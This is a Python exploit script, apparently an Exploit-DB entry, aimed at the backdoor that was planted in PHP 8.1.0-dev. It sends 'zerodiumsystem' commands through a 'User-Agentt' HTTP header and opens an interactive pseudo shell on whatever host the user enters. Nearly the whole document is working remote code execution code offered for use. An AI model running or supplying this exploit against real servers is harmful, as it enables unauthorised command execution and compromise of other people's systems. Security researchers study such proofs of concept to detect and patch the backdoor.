# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution # Date: 23 may 2021 # Exploit Author: flast101 # Vendor Homepage: https://www.php.net/ # Software Link: # - https://hub.docker.com/r/phpdaily/php # - https://github.com/phpdaily/php # Version: 8.1.0-dev # Tested on: Ubuntu 20.04 # References: # - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a # - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md """ Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/ Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py Contact: flast101.sec@gmail.com An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header. The following exploit uses the backdoor to provide a pseudo shell ont the host. """ #!/usr/bin/env python3 import os import re import requests host = input("Enter the full host url:\n") request = requests.Session() response = request.get(host) if str(response) == '<Response [200]>': print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.") try: while 1: cmd = input("$ ") headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "User-Agentt": "zerodiumsystem('" + cmd + "');" } response = request.get(host, headers = headers, allow_redirects = False) current_page = response.text stdout = current_page.split('<!DOCTYPE html>',1) text = print(stdout[0]) except KeyboardInterrupt: print("Exiting...") exit else: print("\r") print(response) print("Host is not available, aborting...") exit